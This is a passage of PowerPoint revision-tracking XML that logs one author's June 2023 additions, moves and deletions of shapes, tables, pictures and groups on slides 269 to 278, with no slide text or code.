            <ac:spMk id="2" creationId="{79D1F2EE-40ED-CF36-FB98-0440C2805D83}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:27:39.181" v="1814" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063557767" sldId="269"/>
            <ac:spMk id="6" creationId="{CB2E20E7-0E7A-4DE1-C703-5A9BDE010CA6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:27:39.181" v="1814" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063557767" sldId="269"/>
            <ac:spMk id="8" creationId="{D310A24E-CF1F-AEFE-F1A6-D5AB0D347D35}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:27:49.132" v="1836" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063557767" sldId="269"/>
            <ac:spMk id="10" creationId="{30D70AB2-1DD7-AD87-69A0-2AB8C06CBECE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:16:16.028" v="1741"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063557767" sldId="269"/>
            <ac:spMk id="13" creationId="{5A2D3BCA-9C10-A83C-35EC-B657609A433A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:16:16.028" v="1741"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063557767" sldId="269"/>
            <ac:spMk id="14" creationId="{D02A54D2-6421-32FB-B5E1-AFBC9A455A3C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:27:49.132" v="1836" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063557767" sldId="269"/>
            <ac:spMk id="16" creationId="{4C169120-4C71-3838-8B18-00C17FDAAC23}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:27:49.132" v="1836" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063557767" sldId="269"/>
            <ac:spMk id="19" creationId="{79BBDBB9-2CF3-6D09-BCA3-FD0A2C741290}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:27:39.181" v="1814" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063557767" sldId="269"/>
            <ac:spMk id="21" creationId="{DB1F3E56-602E-97C1-118F-AEBB336FA5DE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:27:39.181" v="1814" actId="1076"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063557767" sldId="269"/>
            <ac:graphicFrameMk id="3" creationId="{3332CEEB-2E8D-56F0-EE4C-DECCA630D3E8}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:27:39.181" v="1814" actId="1076"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063557767" sldId="269"/>
            <ac:graphicFrameMk id="4" creationId="{12F96AA6-F7DA-2728-0981-9502FC4F723A}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:27:49.132" v="1836" actId="1036"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063557767" sldId="269"/>
            <ac:graphicFrameMk id="11" creationId="{A18158AA-945A-262A-6056-C547FD63BDE8}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="add del mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:16:16.028" v="1741"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063557767" sldId="269"/>
            <ac:graphicFrameMk id="12" creationId="{4DF0850A-744F-9FB7-84BF-00BB8C56416F}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:27:49.132" v="1836" actId="1036"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063557767" sldId="269"/>
            <ac:graphicFrameMk id="17" creationId="{E596A2C5-F7E2-29E6-6632-16C565E8AF3F}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:27:49.132" v="1836" actId="1036"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063557767" sldId="269"/>
            <ac:graphicFrameMk id="20" creationId="{07AD5E15-55B6-E22C-1AF1-CE582DCDB31A}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-14T19:40:38.438" v="6827" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2724075013" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:34:38.494" v="1888" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2724075013" sldId="270"/>
            <ac:spMk id="2" creationId="{336662F9-BE74-0953-3077-A3E35AC19844}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:36:46.853" v="1889"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2724075013" sldId="270"/>
            <ac:spMk id="3" creationId="{C70CFC0C-3EBE-2520-D8E0-11AF0E3B5757}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:37:52.431" v="1903" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2724075013" sldId="270"/>
            <ac:spMk id="5" creationId="{71B501B6-B318-A29A-224D-7B2B17E9E67C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:37:46.240" v="1901" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2724075013" sldId="270"/>
            <ac:spMk id="8" creationId="{ED57BE11-58A3-295B-E3D8-95DBB71F6B52}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:44:21.901" v="2107" actId="1035"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2724075013" sldId="270"/>
            <ac:spMk id="10" creationId="{E87DCE68-9B2C-D73F-18CB-90F70E4BBE02}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-14T19:40:38.438" v="6827" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2724075013" sldId="270"/>
            <ac:spMk id="12" creationId="{5366F7AE-E746-A86A-F213-2CA123199162}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-14T19:39:42.745" v="6823" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2724075013" sldId="270"/>
            <ac:spMk id="14" creationId="{9E4F754D-4204-A34A-3AD5-FDE0219DF903}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:36:46.853" v="1889"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2724075013" sldId="270"/>
            <ac:graphicFrameMk id="4" creationId="{4D803F90-68CE-1D5A-D934-A60ADF4643A5}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:37:13.874" v="1894" actId="1076"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2724075013" sldId="270"/>
            <ac:graphicFrameMk id="6" creationId="{2673149F-A245-021A-A251-4779EE286EBA}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-14T19:39:38.467" v="6822" actId="2165"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2724075013" sldId="270"/>
            <ac:graphicFrameMk id="13" creationId="{7E8E7C97-8D9C-4F9C-6B90-522171458081}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:56:37.881" v="2259" actId="15"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4120202074" sldId="271"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:51:12.445" v="2146" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4120202074" sldId="271"/>
            <ac:spMk id="2" creationId="{51266210-16A3-66E5-BF31-9DC81F799A7A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:56:37.881" v="2259" actId="15"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4120202074" sldId="271"/>
            <ac:spMk id="4" creationId="{3C8297AA-5999-5436-367C-71EBDCA5D4D1}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:55:16.134" v="2233"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="369169497" sldId="272"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:55:16.134" v="2233"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="369169497" sldId="272"/>
            <ac:spMk id="2" creationId="{BCD57A3A-3203-FEB5-D712-05AE8A598376}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:54:28.787" v="2203" actId="15"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="369169497" sldId="272"/>
            <ac:spMk id="4" creationId="{47D538BC-DCBA-7BB1-ECCA-571F6C36E938}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:58:54.055" v="2326" actId="113"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1701838719" sldId="273"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:57:03.981" v="2298" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1701838719" sldId="273"/>
            <ac:spMk id="2" creationId="{860C86DF-7DE3-CF22-C9BD-4AF0D6D6FD39}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:58:54.055" v="2326" actId="113"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1701838719" sldId="273"/>
            <ac:spMk id="4" creationId="{9818BD24-5731-7C5B-0B62-B70F13963816}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modAnim">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:02:02.834" v="5771" actId="1036"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3355929285" sldId="274"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:59:36.818" v="2383" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3355929285" sldId="274"/>
            <ac:spMk id="2" creationId="{86D754E5-A8D7-D031-E15D-B5AFCD87C894}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:02:02.834" v="5771" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3355929285" sldId="274"/>
            <ac:spMk id="5" creationId="{5A83E437-3661-A75C-ACD0-6328EF4DF9BF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:02:02.834" v="5771" actId="1036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3355929285" sldId="274"/>
            <ac:picMk id="3" creationId="{77ADAE90-186C-D2B5-5C8A-CD03B550D655}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T08:06:03.240" v="2475" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2150404955" sldId="275"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T08:00:14.028" v="2402" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2150404955" sldId="275"/>
            <ac:spMk id="2" creationId="{F48D3DB3-DBDA-BBA2-62E9-8B65716C583A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T08:05:56.155" v="2474" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2150404955" sldId="275"/>
            <ac:spMk id="4" creationId="{B33AE681-05C9-C3AE-6EEF-6ECF74701C3A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T08:06:03.240" v="2475" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2150404955" sldId="275"/>
            <ac:spMk id="6" creationId="{C205D92A-25CB-DE6D-C908-2078A0325B51}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T08:05:49.372" v="2472" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2150404955" sldId="275"/>
            <ac:picMk id="3074" creationId="{26CDD67D-0464-4A63-A1A3-899753ABD91E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T08:00:01.316" v="2399" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3847443920" sldId="276"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:59:55.993" v="2386" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3847443920" sldId="276"/>
            <ac:spMk id="2" creationId="{148E319E-A5A4-8DA6-429F-A6A925F52395}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T08:00:01.316" v="2399" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3847443920" sldId="276"/>
            <ac:spMk id="3" creationId="{28D88CF4-67EA-390A-3A61-D87E850A5771}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:59:55.993" v="2386" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3847443920" sldId="276"/>
            <ac:spMk id="4" creationId="{08413169-703E-3792-FF33-EA94B863FD4C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-16T08:16:13.817" v="6828" actId="164"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3783276889" sldId="277"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T08:06:27.780" v="2507" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3783276889" sldId="277"/>
            <ac:spMk id="2" creationId="{1AD2502D-AFE4-6450-4E23-7F69FB36F6FA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:46:38.203" v="2589" actId="12"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3783276889" sldId="277"/>
            <ac:spMk id="4" creationId="{E75AA2A3-5042-D783-286F-219E59ADE2FA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:45:41.848" v="2574" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3783276889" sldId="277"/>
            <ac:spMk id="6" creationId="{696B889F-A54D-C448-9959-4005EB74C089}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod topLvl">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:49:55.597" v="2650" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3783276889" sldId="277"/>
            <ac:spMk id="8" creationId="{3DE8B69A-8237-F006-496F-14143567C1D6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod topLvl">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:49:38.887" v="2646" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3783276889" sldId="277"/>
            <ac:spMk id="10" creationId="{E03FA9D9-D3B5-E272-F112-52AAA9B9D08E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-16T08:16:13.817" v="6828" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3783276889" sldId="277"/>
            <ac:grpSpMk id="3" creationId="{FCD2EA3A-3D0A-B98C-08CC-BDF36007BAFF}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-16T08:16:13.817" v="6828" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3783276889" sldId="277"/>
            <ac:grpSpMk id="5" creationId="{AA12EEB5-574C-CF98-7D6C-ABCA465BF9ED}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-16T08:16:13.817" v="6828" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3783276889" sldId="277"/>
            <ac:picMk id="4098" creationId="{AED94BC2-B8BC-1743-45A6-105791BD516D}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:50:32.006" v="2654"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="480702028" sldId="278"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:50:32.006" v="2654"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="480702028" sldId="278"/>
            <ac:spMk id="2" creationId="{D5AEF674-086B-BB7E-8A9B-50E63FE0CE8F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:50:14.471" v="2652" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="480702028" sldId="278"/>
            <ac:spMk id="4" creationId="{E0346D8A-93B3-6E76-F885-993B2ABB8D34}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod topLvl">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:48:18.927" v="2637" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="480702028" sldId="278"/>
            <ac:spMk id="5" creationId="{E5470AFB-633C-09C9-DCC1-AD09A6338E43}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod topLvl">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:48:18.927" v="2637" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="480702028" sldId="278"/>
            <ac:spMk id="6" creationId="{4A2C97E6-E3A1-1E31-D549-CB2D3A9B0AB4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:48:18.927" v="2637" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="480702028" sldId="278"/>
            <ac:grpSpMk id="3" creationId="{E9E591D1-1513-2773-57A6-AB5F32F7C2AB}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
